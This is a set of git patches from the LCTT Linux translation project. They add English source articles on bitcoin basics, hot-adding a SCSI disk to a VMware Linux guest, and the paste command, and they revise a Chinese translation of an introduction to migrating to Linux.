+among others. These applications make use of some graphics card and processor features to generate bitcoins. The efficiency of mining bitcoins on a pc largely depends on the type of graphics card and the processor of the mining rig. Besides, there are many secure online storages for backing up bitcoins. These sites provide bitcoin storage services free of charge. Examples of bitcoin managing sites include;
+
+[xapo][17]
+
+,
+
+[BlockChain][18]
+
+etc. signing up on these sites require a valid email and phone number for verification. Xapo offers additional security through the phone application by requesting for verification whenever a new sign in is made.
+
+### Disadvantages Of Bitcoins
+
+The numerous advantages ripped from using bitcoins digital currency cannot be overlooked. However, as it is still in its infancy stage, the bitcoin currency meets several points of resistance. For instance, the majority of individual are not fully aware of the bitcoin digital currency and how it works. The lack of awareness can be mitigated through education and creation of awareness. Bitcoin users also face volatility as the demand for bitcoins is higher than the available amount of coins. However, given more time, volatility will be lowered as when many people will start using bitcoins.
+
+### Improvements Can be Made
+
+Based on the infancy of the
+
+[bitcoin technology][19]
+
+, there is still room for changes to make it more secure and reliable. Given more time, the bitcoin currency will be developed enough to provide flexibility as a common currency. For the bitcoin to succeed, many people need to be made aware of it besides being given information on how it works and its benefits.
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxandubuntu.com/home/things-you-need-to-know-about-bitcoins
+
+作者:[LINUXANDUBUNTU][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxandubuntu.com/
+[1]:http://www.linuxandubuntu.com/home/bitkey-a-linux-distribution-dedicated-for-conducting-bitcoin-transactions
+[2]:http://www.linuxandubuntu.com/home/bitkey-a-linux-distribution-dedicated-for-conducting-bitcoin-transactions
+[3]:http://www.linuxandubuntu.com/home/things-you-need-to-know-about-bitcoins
+[4]:https://freebitco.in/?r=2167375
+[5]:http://moonbit.co.in/?ref=c637809a5051
+[6]:https://bitcoin.org/en/choose-your-wallet
+[7]:https://blockchain.info/wallet/
+[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/freebitco-bitcoin-mining-site_orig.jpg
+[9]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/moonbitcoin-bitcoin-mining-site_orig.png
+[10]:http://mtgox.com/
+[11]:https://en.bitcoin.it/wiki/BitNZ
+[12]:https://www.bitstamp.net/
+[13]:https://btc-e.com/
+[14]:https://www.vertexinc.com/
+[15]:https://www.downloadcloud.com/bitcoin-miner-software.html
+[16]:https://github.com/luke-jr/bfgminer
+[17]:https://xapo.com/
+[18]:https://www.blockchain.com/
+[19]:https://en.wikipedia.org/wiki/Bitcoin
From dc7a6d7e7bc46dc0817b3ef26be79c8da610ab84 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 12:57:19 +0800
Subject: [PATCH 130/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Vmware=20Linux=20?=
=?UTF-8?q?Guest=20Add=20a=20New=20Hard=20Disk=20Without=20Rebooting=20Gue?=
=?UTF-8?q?st?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...a New Hard Disk Without Rebooting Guest.md | 195 ++++++++++++++++++
1 file changed, 195 insertions(+)
create mode 100644 sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
diff --git a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
new file mode 100644
index 0000000000..e0745af406
--- /dev/null
+++ b/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
@@ -0,0 +1,195 @@
+translating by lujun9972
+Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest
+======
+As a system admin, I need to use additional hard drives for to provide more storage space or to separate system data from user data. This procedure, adding physical block devices to virtualized guests, describes how to add a hard drive on the host to a virtualized guest using VMWare software running Linux as guest.
+
+It is possible to add or remove a SCSI device explicitly, or to re-scan an entire SCSI bus without rebooting a running Linux VM guest. This how to is tested under Vmware Server and Vmware Workstation v6.0 (but should work with older version too). All instructions are tested on RHEL, Fedora, CentOS and Ubuntu Linux guest / hosts operating systems.
+
+
+## Step # 1: Add a New Disk To Vm Guest
+
+First, you need to add hard disk by visiting vmware hardware settings menu.
+Click on VM > Settings
+
+![Fig.01: Vmware Virtual Machine Settings ][1]
+
+Alternatively you can press CTRL + D to bring settings dialog box.
+
+Click on Add+ to add new hardware to guest:
+
+![Fig.02: VMWare adding a new hardware][2]
+
+Select hardware type Hard disk and click on Next
+![Fig.03 VMware Adding a new disk wizard ][3]
+
+Select create a new virtual disk and click on Next
+
+![Fig.04: Vmware Wizard Disk ][4]
+
+Set virtual disk type to SCSI and click on Next
+
+![Fig.05: Vmware Virtual Disk][5]
+
+Set maximum disk size as per your requirements and click on Next
+
+![Fig.06: Finalizing Disk Virtual Addition ][6]
+
+Finally, set file location and click on Finish.
+
+## Step # 2: Rescan the SCSI Bus to Add a SCSI Device Without rebooting the VM
+
+A rescan can be issued by typing the following command:
+`echo "- - -" > /sys/class/scsi_host/ **host#** /scan
+fdisk -l
+tail -f /var/log/message`
+Sample outputs:
+![Linux Vmware Rescan New Scsi Disk Without Reboot][7]
+Replace host# with actual value such as host0. You can find scsi_host value using the following command:
+`# ls /sys/class/scsi_host`
+Output:
+```
+host0
+```
+
+Now type the following to send a rescan request:
+`echo "- - -" > /sys/class/scsi_host/ **host0** /scan
+fdisk -l
+tail -f /var/log/message`
+Sample Outputs:
+```
+Jul 18 16:29:39 localhost kernel: Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+Jul 18 16:29:39 localhost kernel: Type: Direct-Access ANSI SCSI revision: 02
+Jul 18 16:29:39 localhost kernel: target0:0:1: Beginning Domain Validation
+Jul 18 16:29:39 localhost kernel: target0:0:1: Domain Validation skipping write tests
+Jul 18 16:29:39 localhost kernel: target0:0:1: Ending Domain Validation
+Jul 18 16:29:39 localhost kernel: target0:0:1: FAST-40 WIDE SCSI 80.0 MB/s ST (25 ns, offset 127)
+Jul 18 16:29:39 localhost kernel: SCSI device sdb: 2097152 512-byte hdwr sectors (1074 MB)
+Jul 18 16:29:39 localhost kernel: sdb: Write Protect is off
+Jul 18 16:29:39 localhost kernel: sdb: cache data unavailable
+Jul 18 16:29:39 localhost kernel: sdb: assuming drive cache: write through
+Jul 18 16:29:39 localhost kernel: SCSI device sdb: 2097152 512-byte hdwr sectors (1074 MB)
+Jul 18 16:29:39 localhost kernel: sdb: Write Protect is off
+Jul 18 16:29:39 localhost kernel: sdb: cache data unavailable
+Jul 18 16:29:39 localhost kernel: sdb: assuming drive cache: write through
+Jul 18 16:29:39 localhost kernel: sdb: unknown partition table
+Jul 18 16:29:39 localhost kernel: sd 0:0:1:0: Attached scsi disk sdb
+Jul 18 16:29:39 localhost kernel: sd 0:0:1:0: Attached scsi generic sg1 type 0
+Jul 18 16:29:39 localhost kernel: Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+Jul 18 16:29:39 localhost kernel: Type: Direct-Access ANSI SCSI revision: 02
+Jul 18 16:29:39 localhost kernel: target0:0:2: Beginning Domain Validation
+Jul 18 16:29:39 localhost kernel: target0:0:2: Domain Validation skipping write tests
+Jul 18 16:29:39 localhost kernel: target0:0:2: Ending Domain Validation
+Jul 18 16:29:39 localhost kernel: target0:0:2: FAST-40 WIDE SCSI 80.0 MB/s ST (25 ns, offset 127)
+Jul 18 16:29:39 localhost kernel: SCSI device sdc: 2097152 512-byte hdwr sectors (1074 MB)
+Jul 18 16:29:39 localhost kernel: sdc: Write Protect is off
+Jul 18 16:29:39 localhost kernel: sdc: cache data unavailable
+Jul 18 16:29:39 localhost kernel: sdc: assuming drive cache: write through
+Jul 18 16:29:39 localhost kernel: SCSI device sdc: 2097152 512-byte hdwr sectors (1074 MB)
+Jul 18 16:29:39 localhost kernel: sdc: Write Protect is off
+Jul 18 16:29:39 localhost kernel: sdc: cache data unavailable
+Jul 18 16:29:39 localhost kernel: sdc: assuming drive cache: write through
+Jul 18 16:29:39 localhost kernel: sdc: unknown partition table
+Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi disk sdc
+Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
+```
+
+### How Do I Delete a Single Device Called /dev/sdc?
+
+In addition to re-scanning the entire bus, a specific device can be added or existing device deleted using the following command:
+`# echo 1 > /sys/block/devName/device/delete
+# echo 1 > /sys/block/ **sdc** /device/delete`
+
+### How Do I Add a Single Device Called /dev/sdc?
+
+To add a single device explicitly, use the following syntax:
+```
+# echo "scsi add-single-device " > /proc/scsi/scsi
+```
+
+Where,
+
+ * : Host
+ * : Bus (Channel)
+ * : Target (Id)
+ * : LUN numbers
+
+
+
+For e.g. add /dev/sdc with host # 0, bus # 0, target # 2, and LUN # 0, enter:
+`# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
+# fdisk -l
+# cat /proc/scsi/scsi`
+Sample Outputs:
+```
+Attached devices:
+Host: scsi0 Channel: 00 Id: 00 Lun: 00
+ Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+ Type: Direct-Access ANSI SCSI revision: 02
+Host: scsi0 Channel: 00 Id: 01 Lun: 00
+ Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+ Type: Direct-Access ANSI SCSI revision: 02
+Host: scsi0 Channel: 00 Id: 02 Lun: 00
+ Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+ Type: Direct-Access ANSI SCSI revision: 02
+```
+
+## Step #3: Format a New Disk
+
+Now, you can create partition using [fdisk and format it using mkfs.ext3][8] command:
+`# fdisk /dev/sdc
+### [if you want ext3 fs] ###
+# mkfs.ext3 /dev/sdc3
+### [if you want ext4 fs] ###
+# mkfs.ext4 /dev/sdc3`
+
+## Step #4: Create a Mount Point And Update /etc/fstab
+
+`# mkdir /disk3`
+Open /etc/fstab file, enter:
+`# vi /etc/fstab`
+Append as follows:
+```
+/dev/sdc3 /disk3 ext3 defaults 1 2
+```
+
+For ext4 fs:
+```
+/dev/sdc3 /disk3 ext4 defaults 1 2
+```
+
+Save and close the file.
+
+#### Optional Task: Label the partition
+
+[You can label the partition using e2label command][9]. For example, if you want to label the new partition /backupDisk, enter
+`# e2label /dev/sdc1 /backupDisk`
+See "[The importance of Linux partitions][10]
+
+## about the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][11], [Facebook][12], [Google+][13].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/tips/vmware-add-a-new-hard-disk-without-rebooting-guest.html
+
+作者:[Vivek Gite][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/media/new/tips/2009/07/virtual-machine-settings-1.png (Vmware Virtual Machine Settings )
+[2]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-add-hardware-wizard-2.png (VMWare adding a new hardware)
+[3]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-add-hardware-anew-disk-3.png (VMware Adding a new disk wizard )
+[4]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-add-hardware-4.png (Vmware Wizard Disk )
+[5]:https://www.cyberciti.biz/media/new/tips/2009/07/add-hardware-5.png (Vmware Virtual Disk)
+[6]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-final-disk-file-add-hdd-6.png (Finalizing Disk Virtual Addition)
+[7]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-linux-rescan-hard-disk.png (Linux Vmware Rescan New Scsi Disk Without Reboot)
+[8]:https://www.cyberciti.biz/faq/linux-disk-format/
+[9]:https://www.cyberciti.biz/faq/linux-modify-partition-labels-command-to-change-diskname/
+[10]:https://www.cyberciti.biz/faq/linux-partition-howto-set-labels/>how%20to%20label%20a%20Linux%20partition%E2%80%9D%20for%20more%20info.
Conclusion
The%20VMware%20guest%20now%20has%20an%20additional%20virtualized%20storage%20device.%20%20The%20procedure%20works%20for%20all%20physical%20block%20devices,%20this%20includes%20CD-ROM,%20DVD%20and%20floppy%20devices.%20Next,%20time%20I%20will%20write%20about%20adding%20an%20additional%20virtualized%20storage%20device%20using%20XEN%20software.
See%20also
-
Date: Sun, 7 Jan 2018 13:03:53 +0800
Subject: [PATCH 131/371] PRF:20171031 Migrating to Linux- An Introduction.md
@stevenzdg988
---
...031 Migrating to Linux- An Introduction.md | 71 +++++++++++--------
1 file changed, 43 insertions(+), 28 deletions(-)
diff --git a/translated/tech/20171031 Migrating to Linux- An Introduction.md b/translated/tech/20171031 Migrating to Linux- An Introduction.md
index 6128c5ccd0..776aac13cc 100644
--- a/translated/tech/20171031 Migrating to Linux- An Introduction.md
+++ b/translated/tech/20171031 Migrating to Linux- An Introduction.md
@@ -1,52 +1,67 @@
-
-迁移到 Linux :入门介绍
+迁移到 Linux :入门介绍
======
+
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/migrating-to-linux.jpg?itok=sjcGK0SY)
-运行 Linux 的计算机系统到遍布每个角落。Linux 运行我们的互联网服务,从谷歌搜索到“脸书” ```(Facebook)```,等等。Linux 也在很多设备上运行,包括我们的智能手机、电视,甚至汽车。当然,Linux 也可以运行在您的桌面系统上。如果您是 Linux 新手,或者您想在您的桌面计算机上尝试一些不同的东西,这篇文章将简要地介绍其基础知识,并帮助您从另一个系统迁移到 Linux。
-切换到不同的操作系统可能是一个挑战,因为每个操作系统都提供了不同的操作方法。其在一个系统上的第二特性可能会阻碍其在另一个系统正常使用,因此我们需要到网上或书本上查找怎样操作。
-### Windows 与 Linux 的区别 ```来自于法语(万岁的区别)--来自于 wiktionary ```
+> 这个新文章系列将帮你从其他操作系统迁移到 Linux。
-要开始使用 Linux,您可能会注意到,Linux 的打包方式不同。在其他操作系统中,许多组件被捆绑在一起,只是包的一部分。然而,在 Linux 中,每个组件都被分别调用。举个例子来说,在 Windows 下,图形界面只是操作系统的一部分。而在 Linux 下,您可以从多个图形环境中进行选择,比如 GNOME、KDE Plasma、Cinnamon 和 MATE 等。
-At a high level, a Linux installation includes the following things:
-在高级别上,Linux安装包括以下内容:
- 1. 内核
- 2. 系统程序和文件驻留在磁盘上
- 3. 图形环境
- 4. 包管理器
- 5. 应用程序
+运行 Linux 的计算机系统到遍布在每个角落。Linux 运行着从谷歌搜索到“脸书”等等各种互联网服务。Linux 也在很多设备上运行,包括我们的智能手机、电视,甚至汽车。当然,Linux 也可以运行在您的桌面系统上。如果您是 Linux 新手,或者您想在您的桌面计算机上尝试一些不同的东西,这篇文章将简要地介绍其基础知识,并帮助您从另一个系统迁移到 Linux。
+切换到不同的操作系统可能是一个挑战,因为每个操作系统都提供了不同的操作方法。其在一个系统上的习惯可能会对另一个系统的使用形成阻挠,因此我们需要到网上或书本上查找怎样操作。
+### Windows 与 Linux 的区别
+
+(LCTT 译注:本节标题 Vive la différence ,来自于法语,意即“差异万岁”——来自于 wiktionary)
+
+要开始使用 Linux,您可能会注意到,Linux 的打包方式不同。在其他操作系统中,许多组件被捆绑在一起,只是该软件包的一部分。然而,在 Linux 中,每个组件都被分别调用。举个例子来说,在 Windows 下,图形界面只是操作系统的一部分。而在 Linux 下,您可以从多个图形环境中进行选择,比如 GNOME、KDE Plasma、Cinnamon 和 MATE 等。
+
+从更高层面上看,一个 Linux 包括以下内容:
+
+1. 内核
+2. 驻留在磁盘上的系统程序和文件
+3. 图形环境
+4. 包管理器
+5. 应用程序
### 内核
-操作系统的核心称为内核。内核是引擎罩下的引擎。它允许多个应用程序同时运行,并协调它们对公共服务和设备的访问,从而使所有设备运行顺畅。
-### 系统程序和文件(系统)
+操作系统的核心称为内核。内核是引擎罩下的引擎。它允许多个应用程序同时运行,并协调它们对公共服务和设备的访问,从而使所有设备运行顺畅。
-系统程序位于文件和目录的标准层次结构中的磁盘上。这些系统程序和文件包括后台运行的服务(称为守护进程)、各种操作的实用程序、配置文件和日志文件。
+### 系统程序和文件
-这些系统程序不是在内核中运行,而是执行基本系统操作的应用程序——例如,设置日期和时间,并在网络上连接,这样你就可以上网了。
+系统程序以标准的文件和目录的层次结构位于磁盘上。这些系统程序和文件包括后台运行的服务(称为守护进程)、用于各种操作的实用程序、配置文件和日志文件。
-这里包含了初始化(init)程序——最新运行应用程序。该程序负责启动所有后台服务(如WEB服务器)、启动网络链接和启动图形环境。这个初始化(init)程序将根据需要启动其他系统程序。
+这些系统程序不是在内核中运行,而是执行基本系统操作的程序——例如,设置日期和时间,以及连接网络以便你可以上网。
+
+这里包含了初始化程序——它是最初运行的程序。该程序负责启动所有后台服务(如 Web 服务器)、启动网络连接和启动图形环境。这个初始化程序将根据需要启动其它系统程序。
其他系统程序为简单的任务提供便利,比如添加用户和组、更改密码和配置磁盘。
+
### 图形环境
-图形环境实际上只是更多的系统程序和文件。图形环境提供了常用的菜单窗口、鼠标指针、对话框、状态和指示器等。
-需要注意的是,您不需要使用最初安装的图形环境。如果你愿意,你可以把它另外的形式。每个图形环境都有不同的特性。有些看起来更像 Apple OS X,有些看起来更像 Windows,有些则是独一无二的,不要试图模仿其他的图形界面。
+图形环境实际上只是更多的系统程序和文件。图形环境提供了常用的带有菜单的窗口、鼠标指针、对话框、状态和指示器等。
+
+需要注意的是,您不是必须需要使用原本安装的图形环境。如果你愿意,你可以把它换成其它的。每个图形环境都有不同的特性。有些看起来更像 Apple OS X,有些看起来更像 Windows,有些则是独特的而不试图模仿其他的图形界面。
+
### 包管理器
-包管理器在不同的系统中很难被我们把握,但是现在有一个人们非常熟悉的类似的系统——应用程序商店。软件包系统实际上是为 Linux 存储应用程序。您可以使用包管理器来选择您想要的应用程序,而不是从该web站点安装这个应用程序,以及从另一个站点来安装其他应用程序。然后,包管理器从预先构建的开放源码应用程序的中心知识库安装应用程序。
+对于来自不同操作系统的人来说,包管理器比较难以掌握,但是现在有一个人们非常熟悉的类似的系统——应用程序商店。软件包系统实际上就是 Linux 的应用程序商店。您可以使用包管理器来选择您想要的应用程序,而不是从一个网站安装这个应用程序,而从另一个网站来安装那个应用程序。然后,包管理器会从预先构建的开源应用程序的中心仓库安装应用程序。
+
### 应用程序
-Linux附带了许多预安装的应用程序。您可以从包管理器获得更多。许多应用程序相当棒,其他人需要工作(?)。有时,同一个应用程序在 Windows 或 Mac OS 或 Linux 上运行的版本会不同。
-例如,您可以使用 Firefox 浏览器和 Thunderbird (用于电子邮件)。您可以使用 LibreOffice 作为 Microsoft Office 的替代品,并通过 Valve's Steam 程序运行游戏。您甚至可以在 Linux 上使用 WINE 来运行一些本地 Windows 应用程序。
+Linux 附带了许多预安装的应用程序。您可以从包管理器获得更多。许多应用程序相当棒,另外一些还需要改进。有时,同一个应用程序在 Windows 或 Mac OS 或 Linux 上运行的版本会不同。
+
+例如,您可以使用 Firefox 浏览器和 Thunderbird (用于电子邮件)。您可以使用 LibreOffice 作为 Microsoft Office 的替代品,并通过 Valve 的 Steam 程序运行游戏。您甚至可以在 Linux 上使用 WINE 来运行一些 Windows 原生的应用程序。
+
### 安装 Linux
-第一步通常是安装Linux发行版。你可能听说过 Red Hat、Ubuntu、Fedora、Arch Linux 和 SUSE,等等。这些是 Linux 的不同发行版。
-如果没有 Linux 发行版,则必须分别安装每个组件。许多组件是由不同人群开发和提供的,因此单独安装每个组件将是一项冗长而乏味的任务。幸运的是,构建 ```distros``` 的人会为您做这项工作。他们抓取所有的组件,构建它们,确保它们一起工作,然后将它们打包在一个单独的安装进程中。
-各种发行版可能会做出不同的选择,使用不同的组件,但它仍然是 Linux。应用程序被开发在一个发行版中却经常在其他发行版上运行的很好。
-如果你是一个Linux初学者,想尝试Linux,我推荐[Ubuntu 安装][1]。还有其他的发行版也可以尝试: Linux Mint、Fedora、Debian、Zorin OS、Elementary OS等等。在以后的文章中,我们将介绍 Linux 系统的其他方面,并提供关于如何开始使用 Linux 的更多信息。
+第一步通常是安装 Linux 发行版。你可能听说过 Red Hat、Ubuntu、Fedora、Arch Linux 和 SUSE,等等。这些都是 Linux 的不同发行版。
+
+如果没有 Linux 发行版,则必须分别安装每个组件。许多组件是由不同人群开发和提供的,因此单独安装每个组件将是一项冗长而乏味的任务。幸运的是,构建发行版的人会为您做这项工作。他们抓取所有的组件,构建它们,确保它们可以在一起工作,然后将它们打包在一个单一的安装套件中。
+
+各种发行版可能会做出不同的选择、使用不同的组件,但它仍然是 Linux。在一个发行版中开发的应用程序通常在其他发行版上运行的也很好。
+
+如果你是一个 Linux 初学者,想尝试 Linux,我推荐[安装 Ubuntu][1]。还有其他的发行版也可以尝试: Linux Mint、Fedora、Debian、Zorin OS、Elementary OS 等等。在以后的文章中,我们将介绍 Linux 系统的其他方面,并提供关于如何开始使用 Linux 的更多信息。
--------------------------------------------------------------------------------
@@ -55,7 +70,7 @@ via: https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-int
作者:[John Bonesio][a]
译者:[stevenzdg988](https://github.com/stevenzdg988)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From b0572896c20c40435df0392b9d52efa1f5101781 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 13:04:18 +0800
Subject: [PATCH 132/371] PUB:20171031 Migrating to Linux- An Introduction.md
@stevenzdg988 https://linux.cn/article-9212-1.html
---
.../20171031 Migrating to Linux- An Introduction.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171031 Migrating to Linux- An Introduction.md (100%)
diff --git a/translated/tech/20171031 Migrating to Linux- An Introduction.md b/published/20171031 Migrating to Linux- An Introduction.md
similarity index 100%
rename from translated/tech/20171031 Migrating to Linux- An Introduction.md
rename to published/20171031 Migrating to Linux- An Introduction.md
From 2bc4c04c9e6c8e45738572387800d9fb36da7a26 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 13:05:39 +0800
Subject: [PATCH 133/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20paste=20C?=
=?UTF-8?q?ommand=20Explained=20For=20Beginners=20(5=20Examples)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Explained For Beginners (5 Examples).md | 100 ++++++++++++++++++
1 file changed, 100 insertions(+)
create mode 100644 sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
diff --git a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
new file mode 100644
index 0000000000..c48115f050
--- /dev/null
+++ b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
@@ -0,0 +1,100 @@
+Linux paste Command Explained For Beginners (5 Examples)
+======
+
+Sometimes, while working on the command line in Linux, there may arise a situation wherein you have to merge lines of multiple files to create more meaningful/useful data. Well, you'll be glad to know there exists a command line utility **paste** that does this for you. In this tutorial, we will discuss the basics of this command as well as the main features it offers using easy to understand examples.
+
+But before we do that, it's worth mentioning that all examples mentioned in this article have been tested on Ubuntu 16.04 LTS.
+
+### Linux paste command
+
+As already mentioned above, the paste command merges lines of files. Here's the tool's syntax:
+
+paste [OPTION]... [FILE]...
+
+And here's how the mage of paste explains it:
+```
+Write lines consisting of the sequentially corresponding lines from each FILE, separated by TABs,
+to standard output. With no FILE, or when FILE is -, read standard input.
+```
+
+The following Q&A-styled examples should give you a better idea on how paste works.
+
+### Q1. How to join lines of multiple files using paste command?
+
+Suppose we have three files - file1.txt, file2.txt, and file3.txt - with following contents:
+
+[![How to join lines of multiple files using paste command][1]][2]
+
+And the task is to merge lines of these files in a way that each row of the final output contains index, country, and continent, then you can do that using paste in the following way:
+
+paste file1.txt file2.txt file3.txt
+
+[![result of merging lines][3]][4]
+
+### Q2. How to apply delimiters when using paste?
+
+Sometimes, there can be a requirement to add a delimiting character between entries of each resulting row. This can be done using the **-d** command line option, which requires you to provide the delimiting character you want to use.
+
+For example, to apply a colon (:) as a delimiting character, use the paste command in the following way:
+
+paste -d : file1.txt file2.txt file3.txt
+
+Here's the output this command produced on our system:
+
+[![How to apply delimiters when using paste][5]][6]
+
+### Q3. How to change the way in which lines are merged?
+
+By default, the paste command merges lines in a way that entries in the first column belongs to the first file, those in the second column are for the second file, and so on and so forth. However, if you want, you can change this so that the merge operation happens row-wise.
+
+This you can do using the **-s** command line option.
+
+paste -s file1.txt file2.txt file3.txt
+
+Following is the output:
+
+[![How to change the way in which lines are merged][7]][8]
+
+### Q4. How to use multiple delimiters?
+
+Yes, you can use multiple delimiters as well. For example, if you want to use both : and |, you can do that in the following way:
+
+paste -d ':|' file1.txt file2.txt file3.txt
+
+Following is the output:
+
+[![How to use multiple delimiters][9]][10]
+
+### Q5. How to make sure merged lines are NUL terminated?
+
+By default, lines merged through paste end in a newline. However, if you want, you can make them NUL terminated, something which you can do using the **-z** option.
+
+paste -z file1.txt file2.txt file3.txt
+
+### Conclusion
+
+As most of you'd agree, the paste command isn't difficult to understand and use. It may offer a limited set of command line options, but the tool does what it claims. You may not require it on daily basis, but paste can be a real-time saver in some scenarios. Just in case you need, [here's the tool's man page][11].
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-paste-command/
+
+作者:[Himanshu Arora][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/command-tutorial/paste-3-files.png
+[2]:https://www.howtoforge.com/images/command-tutorial/big/paste-3-files.png
+[3]:https://www.howtoforge.com/images/command-tutorial/paste-basic-usage.png
+[4]:https://www.howtoforge.com/images/command-tutorial/big/paste-basic-usage.png
+[5]:https://www.howtoforge.com/images/command-tutorial/paste-d-option.png
+[6]:https://www.howtoforge.com/images/command-tutorial/big/paste-d-option.png
+[7]:https://www.howtoforge.com/images/command-tutorial/paste-s-option.png
+[8]:https://www.howtoforge.com/images/command-tutorial/big/paste-s-option.png
+[9]:https://www.howtoforge.com/images/command-tutorial/paste-d-mult1.png
+[10]:https://www.howtoforge.com/images/command-tutorial/big/paste-d-mult1.png
+[11]:https://linux.die.net/man/1/paste
From 9376cc442c4a6782551e378bee15b2d7e7cbf423 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 13:20:44 +0800
Subject: [PATCH 134/371] reformat
---
sources/tech/20170919 What Are Bitcoins.md | 67 ++--------------------
1 file changed, 6 insertions(+), 61 deletions(-)
diff --git a/sources/tech/20170919 What Are Bitcoins.md b/sources/tech/20170919 What Are Bitcoins.md
index 3bc805e198..35ff986891 100644
--- a/sources/tech/20170919 What Are Bitcoins.md
+++ b/sources/tech/20170919 What Are Bitcoins.md
@@ -28,67 +28,16 @@ Also Read - [Bitkey A Linux Distribution Dedicated To Bitcoin Transactions][2]
### How To Mine Bitcoins and The Applications to Accomplish Necessary Bitcoin Management Tasks
-In the digital currency, BITCOIN mining and management requires additional software. There are numerous open source bitcoin management software that make it easy to make payments, receive payments, encrypt and backup of your bitcoins and also bitcoin mining software. There are sites such as;
+In the digital currency, BITCOIN mining and management requires additional software. There are numerous open source bitcoin management software that make it easy to make payments, receive payments, encrypt and backup of your bitcoins and also bitcoin mining software. There are sites such as; [Freebitcoin][4] where one earns free bitcoins by viewing ads, [MoonBitcoin][5] is another site that one can sign up for free and earn bitcoins. However, it is convenient if one has spare time and a sizable network of friends participating in the same. There are many sites offering bitcoin mining and one can easily sign up and start mining. One of the major secrets is referring as many people as you can to create a large network.
-[Freebitcoin][4]
-
-where one earns free bitcoins by viewing ads,
-
-[MoonBitcoin][5]
-
-is another site that one can sign up for free and earn bitcoins. However, it is convenient if one has spare time and a sizable network of friends participating in the same. There are many sites offering bitcoin mining and one can easily sign up and start mining. One of the major secrets is referring as many people as you can to create a large network.
-
-Applications required for use with bitcoins include the bitcoin wallet which allows one to safely keep bitcoins. This is just like the physical wallet using to keep hard cash but in a digital form. The wallet can be downloaded here -
-
-[Bitcoin - Wallet][6]
-
-. Other similar applications include; the
-
-[Blockchain][7]
-
-which works similar to the Bitcoin Wallet.
+Applications required for use with bitcoins include the bitcoin wallet which allows one to safely keep bitcoins. This is just like the physical wallet using to keep hard cash but in a digital form. The wallet can be downloaded here - [Bitcoin - Wallet][6] . Other similar applications include; the [Blockchain][7] which works similar to the Bitcoin Wallet.
The screenshots below show the Freebitco and MoonBitco mining sites respectively.
- [![freebitco bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/freebitco-bitcoin-mining-site_orig.jpg)][8] [![moonbitcoin bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/moonbitcoin-bitcoin-mining-site_orig.png)][9]
+ [![freebitco bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/freebitco-bitcoin-mining-site_orig.jpg)][8]
+ [![moonbitcoin bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/moonbitcoin-bitcoin-mining-site_orig.png)][9]
